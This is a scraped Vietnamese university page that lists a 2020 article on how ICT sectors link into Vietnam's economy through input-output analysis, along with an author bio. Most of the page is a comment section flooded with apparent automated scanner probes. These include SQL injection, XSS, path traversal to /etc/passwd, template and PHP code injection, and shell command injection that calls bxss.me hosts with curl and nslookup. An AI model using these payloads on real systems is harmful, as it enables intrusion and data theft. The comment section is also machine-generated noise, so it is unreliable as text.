Image

Tác giả

Đặng Thị Việt Đức

Năm xuất bản

20/07/2020

Chuyên mục

Tài liệu CNTT

Mô tả

This article applied the input-out table (IO) analysis to estimate the linkages of ICT sectors to the Vietnam economy. In this article, the shared output requirement of ICT sectors is analysed to the multiplier effect, inter-sector feedback effect, and spillover effect. The research also examines the induced increase of ICT's output to the final demand of ICT sectors and non-ICT sectors. The results show that although the impact of the domestic ICT sectors in the Vietnam economy increases through time, it is generally not outstanding in comparison with other sectors. The ICT manufacturing sector is rather self-sufficient, stimulating import rather than added value for the domestic economy. From both the intermediate and final demand inducement, ICT media, content and ICT services sectors reveal their significant diffusion and critical inter-sector relationship with other ICT and non-ICT sectors in the economy. The paper also provides policy implications for the future development of ICT in Vietnam

admin_img

Người đăng

Đặng Thị Việt Đức

Cô Đức giảng dạy các môn học liên quan tới tài chính như tài chính tiền tệ, quản trị tài chính, định giá doanh nghiệp, phân tích tài chính doanh nghiệp cho bậc đại học và cao học và quản trị tri thức cho bậc tiến sỹ. Ngoài giảng dạy tại Học viện Công nghệ Bưu chính Viễn thông, cô Đức cũng tham gia giảng dạy các chương trình liên kết bằng tiếng Anh tại các cơ sở đào tạo khác như Đại học Quốc gia Hà Nội, Viện Đại học Mở Hà Nội...

Bình luận

qeNtfPNC 11:20 29/12/2022 - Reply

e

qeNtfPNC 11:20 29/12/2022 - Reply

@qeNtfPNC:

e 19:55 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

kdy4QmQ8

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

OlmRzRYB 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

"+"A".concat(70-3).concat(22*4).concat(121).concat(66).concat(106).concat(65)+(require"socket" Socket.gethostbyname("hitxh"+"apdnpvor4d07b.bxss.me.")[3].to_s)+"

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

'+'A'.concat(70-3).concat(22*4).concat(110).concat(90).concat(105).concat(68)+(require'socket' Socket.gethostbyname('hitid'+'embqogft6041f.bxss.me.')[3].to_s)+'

"+"A".concat(70-3).concat(22*4).concat(122).concat(67).concat(115).concat(70)+(require"socket" Socket.gethostbyname("hitnw"+"cisuapbc34127.bxss.me.")[3].to_s)+" 19:57 27/09/2023 - Reply

@qeNtfPNC:

'+'A'.concat(70-3).concat(22*4).concat(121).concat(84).concat(99).concat(85)+(require'socket' Socket.gethostbyname('hitmv'+'uqdwsgmc679b1.bxss.me.')[3].to_s)+' 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC: %0abcc:009247.9919-11417.9919.e3fe0.19627.2@bxss.me

e 19:57 27/09/2023 - Reply

response.write(9377630*9669696)

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

to@example.com>%0d%0abcc:009247.9919-11418.9919.e3fe0.19627.2@bxss.me

e 19:57 27/09/2023 - Reply

HttP://bxss.me/t/xss.html?%00

e 19:57 27/09/2023 - Reply

../../../../../../../../../../../../../../etc/passwd

e%0abcc:009247.9919-11419.9919.e3fe0.19627.2@bxss.me 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

bxss.me/t/xss.html?%00

e 19:57 27/09/2023 - Reply

../../../../../../../../../../../../../../windows/win.ini

e 19:57 27/09/2023 - Reply

'+response.write(9377630*9669696)+'

to@example.com>%0d%0abcc:009247.9919-11420.9919.e3fe0.19627.2@bxss.me 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

file:///etc/passwd

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

HttP://bxss.me/t/xss.html?%00 19:57 27/09/2023 - Reply

@qeNtfPNC:

bxss.me/t/xss.html?%00 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

../@qeNtfPNC:

e 19:57 27/09/2023 - Reply

"+response.write(9377630*9669696)+"

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

response.write(9046743*9075603) 19:57 27/09/2023 - Reply

@qeNtfPNC:

../../../../../../../../../../../../../../etc/passwd 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

'+response.write(9046743*9075603)+' 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

../../../../../../../../../../../../../../windows/win.ini 19:57 27/09/2023 - Reply

@qeNtfPNC:

"+response.write(9046743*9075603)+" 19:57 27/09/2023 - Reply

@qeNtfPNC:

file:///etc/passwd 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

)

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

!(()&&!|*|*|

../e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

^(#$!@#$)(()))******

e 19:57 27/09/2023 - Reply

@qeNtfPNC: &n918695=v937666

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

) 19:57 27/09/2023 - Reply

@qeNtfPNC:

e&n901423=v969950 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

!(()&&!|*|*| 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

'.gethostbyname(lc('hitbi'.'nxadvywu87422.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(69).chr(98).chr(77).'

e 19:57 27/09/2023 - Reply

xfs.bxss.me

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

^(#$!@#$)(()))****** 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

".gethostbyname(lc("hitsf"."jlzckfizdbb42.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(83).chr(97).chr(80)."

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

xfs.bxss.me 19:57 27/09/2023 - Reply

@qeNtfPNC:

'.gethostbyname(lc('hitmy'.'sqpaydtd8fb4b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(75).chr(97).chr(72).' 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

".gethostbyname(lc("hitbt"."hiwxzkuh839e3.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(71).chr(116).chr(88)." 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

'"()

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC: '&&sleep(27*1000)*dxmnmg&&'

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC: "&&sleep(27*1000)*obdipe&&"

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC: '||sleep(27*1000)*nkykva||'

e 19:57 27/09/2023 - Reply

'"

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

1Kgm0sDeO

e 19:57 27/09/2023 - Reply

@qeNtfPNC: "||sleep(27*1000)*naxoqb||"

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC: <esi:include src="http://bxss.me/rpb.png"/>

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

<!--

1VLXPpdCO 19:57 27/09/2023 - Reply

@qeNtfPNC:

'"() 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e'&&sleep(27*1000)*rdsbfp&&' 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC: '"()&%<zzz><br />

'" 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

${10000194+9999226}

e"&&sleep(27*1000)*wduifr&&" 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

'"()&%<zzz><br />

e<esi:include src="http://bxss.me/rpb.png"/> 19:57 27/09/2023 - Reply

@qeNtfPNC:

<!-- 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC: 9193160

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e'||sleep(27*1000)*fktzva||' 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

${9999776+9999739} 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e'"()&%<zzz><br /> 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

19:57 27/09/2023 - Reply

@qeNtfPNC:

'"()&%<zzz><br /> 19:57 27/09/2023 - Reply

@qeNtfPNC:

e"||sleep(27*1000)*xchsrk||" 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

';print(md5(31337));$a='

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

";print(md5(31337));$a="

e9089495 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

${@print(md5(31337))}

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

${@print(md5(31337))}\

e 19:57 27/09/2023 - Reply

echo tghjgs$()\ ivjrgi\nz^xyu||a #' &echo tghjgs$()\ ivjrgi\nz^xyu||a #|" &echo tghjgs$()\ ivjrgi\nz^xyu||a #

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

'.print(md5(31337)).'

e 19:57 27/09/2023 - Reply

&echo ojetzr$()\ ybsttu\nz^xyu||a #' &echo ojetzr$()\ ybsttu\nz^xyu||a #|" &echo ojetzr$()\ ybsttu\nz^xyu||a #

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

|echo jhejwz$()\ qarzhv\nz^xyu||a #' |echo jhejwz$()\ qarzhv\nz^xyu||a #|" |echo jhejwz$()\ qarzhv\nz^xyu||a #

e 19:57 27/09/2023 - Reply

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

(nslookup -q=cname hitgywhhqzlrae7bd4.bxss.me||curl hitgywhhqzlrae7bd4.bxss.me))

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

$(nslookup -q=cname hitzxbrlzdisga3df1.bxss.me||curl hitzxbrlzdisga3df1.bxss.me)

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

';print(md5(31337));$a=' 19:57 27/09/2023 - Reply

@qeNtfPNC:

";print(md5(31337));$a=" 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

Http://bxss.me/t/fit.txt

e 19:57 27/09/2023 - Reply

&nslookup -q=cname hitthnjmfkvcv210c0.bxss.me&'\"`0&nslookup -q=cname hitthnjmfkvcv210c0.bxss.me&`'

${@print(md5(31337))} 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

&(nslookup -q=cname hitllbvmtyntd446d4.bxss.me||curl hitllbvmtyntd446d4.bxss.me)&'\"`0&(nslookup -q=cname hitllbvmtyntd446d4.bxss.me||curl hitllbvmtyntd446d4.bxss.me)&`'

e 19:57 27/09/2023 - Reply

http://bxss.me/t/fit.txt%3F.jpg

${@print(md5(31337))}\ 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

|(nslookup -q=cname hitpfzpapxkej5e3fc.bxss.me||curl hitpfzpapxkej5e3fc.bxss.me)

e 19:57 27/09/2023 - Reply

/etc/shells

'.print(md5(31337)).' 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

c:/windows/win.ini

e 19:57 27/09/2023 - Reply

`(nslookup -q=cname hitelqwoakwya22710.bxss.me||curl hitelqwoakwya22710.bxss.me)`

e 19:57 27/09/2023 - Reply

bxss.me

e 19:57 27/09/2023 - Reply

;(nslookup -q=cname hiticztjbkbmh1cf05.bxss.me||curl hiticztjbkbmh1cf05.bxss.me)|(nslookup -q=cname hiticztjbkbmh1cf05.bxss.me||curl hiticztjbkbmh1cf05.bxss.me)&(nslookup -q=cname hiticztjbkbmh1cf05.bxss.me||curl hiticztjbkbmh1cf05.bxss.me)

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

echo oayzqp$()\ ydgtgg\nz^xyu||a #' &echo oayzqp$()\ ydgtgg\nz^xyu||a #|" &echo oayzqp$()\ ydgtgg\nz^xyu||a # 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

Http://bxss.me/t/fit.txt 19:57 27/09/2023 - Reply

@qeNtfPNC:

&echo cxefsd$()\ jzyvls\nz^xyu||a #' &echo cxefsd$()\ jzyvls\nz^xyu||a #|" &echo cxefsd$()\ jzyvls\nz^xyu||a # 19:57 27/09/2023 - Reply

@qeNtfPNC:

http://bxss.me/t/fit.txt%3F.jpg 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

|echo dkvibc$()\ irfsvh\nz^xyu||a #' |echo dkvibc$()\ irfsvh\nz^xyu||a #|" |echo dkvibc$()\ irfsvh\nz^xyu||a # 19:57 27/09/2023 - Reply

@qeNtfPNC:

/etc/shells 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

c:/windows/win.ini 19:57 27/09/2023 - Reply

@qeNtfPNC:

(nslookup -q=cname hitsjmwuojtijf2a7d.bxss.me||curl hitsjmwuojtijf2a7d.bxss.me)) 19:57 27/09/2023 - Reply

@qeNtfPNC:

$(nslookup -q=cname hitjambpewhtm2bc84.bxss.me||curl hitjambpewhtm2bc84.bxss.me) 19:57 27/09/2023 - Reply

@qeNtfPNC:

bxss.me 19:57 27/09/2023 - Reply

@qeNtfPNC:

&nslookup -q=cname hitqrttjqzkfg5801a.bxss.me&'\"`0&nslookup -q=cname hitqrttjqzkfg5801a.bxss.me&`' 19:57 27/09/2023 - Reply

@qeNtfPNC:

&(nslookup -q=cname hitlioekavqya00b66.bxss.me||curl hitlioekavqya00b66.bxss.me)&'\"`0&(nslookup -q=cname hitlioekavqya00b66.bxss.me||curl hitlioekavqya00b66.bxss.me)&`' 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:57 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

|(nslookup -q=cname hitlqfjfrximw3c957.bxss.me||curl hitlqfjfrximw3c957.bxss.me) 19:58 27/09/2023 - Reply

@qeNtfPNC:

`(nslookup -q=cname hitorephiulew8789f.bxss.me||curl hitorephiulew8789f.bxss.me)` 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:58 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 19:59 27/09/2023 - Reply

@qeNtfPNC:

e 20:00 27/09/2023 - Reply

@qeNtfPNC:

e 20:00 27/09/2023 - Reply

@qeNtfPNC:

e 20:03 27/09/2023 - Reply

KxqHpXDv

e 20:03 27/09/2023 - Reply

-1 OR 2+168-168-1=0+0+0+1 --

e 20:03 27/09/2023 - Reply

-1 OR 2+653-653-1=0+0+0+1

e 20:03 27/09/2023 - Reply

-1' OR 2+283-283-1=0+0+0+1 --

e 20:03 27/09/2023 - Reply

-1' OR 2+272-272-1=0+0+0+1 or 'SzTbu7Sm'='

e 20:03 27/09/2023 - Reply

-1" OR 2+612-612-1=0+0+0+1 --

e 20:04 27/09/2023 - Reply

if(now()=sysdate(),sleep(15),0)

e 20:04 27/09/2023 - Reply

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

e 20:04 27/09/2023 - Reply

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

e 20:04 27/09/2023 - Reply

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

e 20:04 27/09/2023 - Reply

1 waitfor delay '0:0:15' --

e 20:04 27/09/2023 - Reply

m3THIoCt'; waitfor delay '0:0:15' --

e 20:04 27/09/2023 - Reply

k77uKERV' OR 691=(SELECT 691 FROM PG_SLEEP(15))--

e 20:04 27/09/2023 - Reply

EEFM2Wvs') OR 213=(SELECT 213 FROM PG_SLEEP(15))--

e 20:04 27/09/2023 - Reply

aqyKtFNh')) OR 111=(SELECT 111 FROM PG_SLEEP(15))--

e 20:05 27/09/2023 - Reply

@qeNtfPNC: '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

e 20:05 27/09/2023 - Reply

1'"

e 20:05 27/09/2023 - Reply

@@1XED0

e 20:05 27/09/2023 - Reply

@qeNtfPNC: 9635324

e 20:05 27/09/2023 - Reply

bfg8405%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8405

e9000330 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

bfgx7841%C0%BEz1%C0%BCz2a%90bcxhjl7841

bfg5369%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5369 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

<%={{={@{#{${dfb}}%>

bfgx8609%C0%BEz1%C0%BCz2a%90bcxhjl8609 20:05 27/09/2023 - Reply

@qeNtfPNC:

<%={{={@{#{${dfb}}%> 20:05 27/09/2023 - Reply

@qeNtfPNC:

XNUZQThC 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

<th:t="${dfb}#foreach

-1 OR 2+634-634-1=0+0+0+1 -- 20:05 27/09/2023 - Reply

@qeNtfPNC:

-1 OR 2+995-995-1=0+0+0+1 20:05 27/09/2023 - Reply

@qeNtfPNC:

<th:t="${dfb}#foreach 20:05 27/09/2023 - Reply

@qeNtfPNC:

-1' OR 2+280-280-1=0+0+0+1 -- 20:05 27/09/2023 - Reply

@qeNtfPNC:

-1' OR 2+306-306-1=0+0+0+1 or '1HStdBTh'=' 20:05 27/09/2023 - Reply

@qeNtfPNC:

-1" OR 2+191-191-1=0+0+0+1 -- 20:05 27/09/2023 - Reply

@qeNtfPNC:

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

dfb{{98991*97996}}xca

if(now()=sysdate(),sleep(15),0) 20:05 27/09/2023 - Reply

@qeNtfPNC:

dfb[[${98991*97996}]]xca 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

dfb__${98991*97996}__::.x

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 20:05 27/09/2023 - Reply

@qeNtfPNC:

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg2497%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2497 20:05 27/09/2023 - Reply

@qeNtfPNC:

bfgx7453%C0%BEz1%C0%BCz2a%90bcxhjl7453 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

@qeNtfPNC: <br />

e 20:05 27/09/2023 - Reply

@qeNtfPNC: <WYGNM8>XQNJ9[!+!]</WYGNM8>

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:05 27/09/2023 - Reply

@qeNtfPNC: %3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%51%54%39%63%28%39%38%38%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 20:05 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <ScRiPt >QT9c(9422)</ScRiPt>

1 waitfor delay '0:0:15' -- 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <isindex type=image src=1 onerror=QT9c(9805)>

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9860'>

e<br /> 20:06 27/09/2023 - Reply

@qeNtfPNC:

Z5XxPRmZ'; waitfor delay '0:0:15' -- 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <body onload=QT9c(9509)>

e<WIUPCP>NCE9R[!+!]</WIUPCP> 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <img src=//xss.bxss.me/t/dot.gif onload=QT9c(9234)>

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <img src=xyz OnErRor=QT9c(9126)>

e%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%62%42%64%64%28%39%32%37%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 20:06 27/09/2023 - Reply

@qeNtfPNC:

Jo9A3jTe' OR 407=(SELECT 407 FROM PG_SLEEP(15))-- 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: <img/src=">" onerror=alert(9013)>

e 20:06 27/09/2023 - Reply

%40%71%65%4E%74%66%50%4E%43%3A%20%3C%53%63%52%69%50%74%20%3E%51%54%39%63%289763%29%3C%2F%73%43%72%69%70%54%3E

e<ScRiPt >bBdd(9211)</ScRiPt> 20:06 27/09/2023 - Reply

@qeNtfPNC:

f552S599') OR 792=(SELECT 792 FROM PG_SLEEP(15))-- 20:06 27/09/2023 - Reply

@qeNtfPNC:

e 20:06 27/09/2023 - Reply

@qeNtfPNC: \u003CScRiPt\QT9c(9877)\u003C/sCripT\u003E

e 20:06 27/09/2023 - Reply

@qeNtfPNC: &lt;ScRiPt&gt;QT9c(9920)&lt;/sCripT&gt;

